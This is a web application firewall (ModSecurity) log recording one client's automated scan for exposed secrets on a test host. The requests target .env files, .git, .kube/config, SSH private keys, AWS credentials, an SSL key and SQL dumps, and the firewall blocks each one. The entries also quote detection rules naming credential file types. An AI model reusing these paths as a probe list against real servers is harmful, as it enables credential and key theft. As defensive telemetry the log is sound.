[Sat Nov 16 16:25:47.052692 2024] [:error] [pid 3348188] [client 213.232.87.228:13485] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Zzi5e2-D6swjDaZ_PXG9SQAAAAM"]
[Sat Nov 16 16:25:47.053020 2024] [:error] [pid 3348188] [client 213.232.87.228:13485] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Zzi5e2-D6swjDaZ_PXG9SQAAAAM"]
[Sat Nov 16 16:25:47.053188 2024] [:error] [pid 3348188] [client 213.232.87.228:13485] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Zzi5e2-D6swjDaZ_PXG9SQAAAAM"]
[Sat Nov 16 16:25:47.059900 2024] [:error] [pid 3351050] [client 213.232.87.228:50795] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Zzi5e0YAfcY0gUVhfR7SRAAAAAg"]
[Sat Nov 16 16:25:47.060106 2024] [:error] [pid 3351050] [client 213.232.87.228:50795] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Zzi5e0YAfcY0gUVhfR7SRAAAAAg"]
[Sat Nov 16 16:25:47.060268 2024] [:error] [pid 3351050] [client 213.232.87.228:50795] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Zzi5e0YAfcY0gUVhfR7SRAAAAAg"]
[Sat Nov 16 16:25:47.062808 2024] [:error] [pid 3348245] [client 213.232.87.228:42705] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Zzi5e5IzK9E2HEz6OXJ03gAAAAY"]
[Sat Nov 16 16:25:47.063089 2024] [:error] [pid 3348245] [client 213.232.87.228:42705] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Zzi5e5IzK9E2HEz6OXJ03gAAAAY"]
[Sat Nov 16 16:25:47.063245 2024] [:error] [pid 3348245] [client 213.232.87.228:42705] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "Zzi5e5IzK9E2HEz6OXJ03gAAAAY"]
[Sat Nov 16 16:25:47.086251 2024] [:error] [pid 3348201] [client 213.232.87.228:49745] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Zzi5eyWFgM7BTj2gZQ2BMQAAAAU"]
[Sat Nov 16 16:25:47.086456 2024] [:error] [pid 3348201] [client 213.232.87.228:49745] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Zzi5eyWFgM7BTj2gZQ2BMQAAAAU"]
[Sat Nov 16 16:25:47.086635 2024] [:error] [pid 3348201] [client 213.232.87.228:49745] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.kube/config"] [unique_id "Zzi5eyWFgM7BTj2gZQ2BMQAAAAU"]
[Sat Nov 16 16:25:47.087755 2024] [:error] [pid 3351054] [client 213.232.87.228:26891] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Zzi5eyt_m10x-znEZRjaOAAAAAw"]
[Sat Nov 16 16:25:47.087934 2024] [:error] [pid 3351054] [client 213.232.87.228:26891] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Zzi5eyt_m10x-znEZRjaOAAAAAw"]
[Sat Nov 16 16:25:47.088080 2024] [:error] [pid 3351054] [client 213.232.87.228:26891] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Zzi5eyt_m10x-znEZRjaOAAAAAw"]
[Sat Nov 16 16:25:47.140176 2024] [:error] [pid 3351088] [client 213.232.87.228:33421] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Zzi5eyj-ULhZUgML6xwgIwAAAAE"]
[Sat Nov 16 16:25:47.140668 2024] [:error] [pid 3351088] [client 213.232.87.228:33421] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Zzi5eyj-ULhZUgML6xwgIwAAAAE"]
[Sat Nov 16 16:25:47.140962 2024] [:error] [pid 3351088] [client 213.232.87.228:33421] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Zzi5eyj-ULhZUgML6xwgIwAAAAE"]
[Sat Nov 16 16:25:47.231561 2024] [:error] [pid 3348188] [client 213.232.87.228:39271] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Zzi5e2-D6swjDaZ_PXG9SgAAAAM"]
[Sat Nov 16 16:25:47.232035 2024] [:error] [pid 3348188] [client 213.232.87.228:39271] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Zzi5e2-D6swjDaZ_PXG9SgAAAAM"]
[Sat Nov 16 16:25:47.232452 2024] [:error] [pid 3348188] [client 213.232.87.228:39271] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Zzi5e2-D6swjDaZ_PXG9SgAAAAM"]
[Sat Nov 16 16:25:47.252028 2024] [:error] [pid 3351106] [client 213.232.87.228:38089] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Zzi5e-W-8hMldF5Eq8BbjwAAAAQ"]
[Sat Nov 16 16:25:47.252287 2024] [:error] [pid 3351106] [client 213.232.87.228:38089] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Zzi5e-W-8hMldF5Eq8BbjwAAAAQ"]
[Sat Nov 16 16:25:47.252516 2024] [:error] [pid 3351106] [client 213.232.87.228:38089] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Zzi5e-W-8hMldF5Eq8BbjwAAAAQ"]
[Sat Nov 16 16:25:47.259356 2024] [:error] [pid 3348245] [client 213.232.87.228:51729] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzi5e5IzK9E2HEz6OXJ03wAAAAY"]
[Sat Nov 16 16:25:47.259687 2024] [:error] [pid 3348245] [client 213.232.87.228:51729] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzi5e5IzK9E2HEz6OXJ03wAAAAY"]
[Sat Nov 16 16:25:47.259992 2024] [:error] [pid 3348245] [client 213.232.87.228:51729] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zzi5e5IzK9E2HEz6OXJ03wAAAAY"]
[Sat Nov 16 16:25:47.386827 2024] [:error] [pid 3351051] [client 213.232.87.228:28921] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Zzi5e4T2zXNLOzKcYQkTGwAAAAk"]
[Sat Nov 16 16:25:47.387125 2024] [:error] [pid 3351051] [client 213.232.87.228:28921] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Zzi5e4T2zXNLOzKcYQkTGwAAAAk"]
[Sat Nov 16 16:25:47.387280 2024] [:error] [pid 3351051] [client 213.232.87.228:28921] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "Zzi5e4T2zXNLOzKcYQkTGwAAAAk"]
[Sat Nov 16 16:25:47.448536 2024] [:error] [pid 3348188] [client 213.232.87.228:19601] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Zzi5e2-D6swjDaZ_PXG9SwAAAAM"]
[Sat Nov 16 16:25:47.448749 2024] [:error] [pid 3348188] [client 213.232.87.228:19601] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Zzi5e2-D6swjDaZ_PXG9SwAAAAM"]
[Sat Nov 16 16:25:47.448906 2024] [:error] [pid 3348188] [client 213.232.87.228:19601] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Zzi5e2-D6swjDaZ_PXG9SwAAAAM"]
[Sat Nov 16 16:25:47.522014 2024] [:error] [pid 3351050] [client 213.232.87.228:31973] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Zzi5e0YAfcY0gUVhfR7SRgAAAAg"]
[Sat Nov 16 16:25:47.522357 2024] [:error] [pid 3351050] [client 213.232.87.228:31973] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Zzi5e0YAfcY0gUVhfR7SRgAAAAg"]
[Sat Nov 16 16:25:47.522520 2024] [:error] [pid 3351050] [client 213.232.87.228:31973] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/administrators.pwd"] [unique_id "Zzi5e0YAfcY0gUVhfR7SRgAAAAg"]
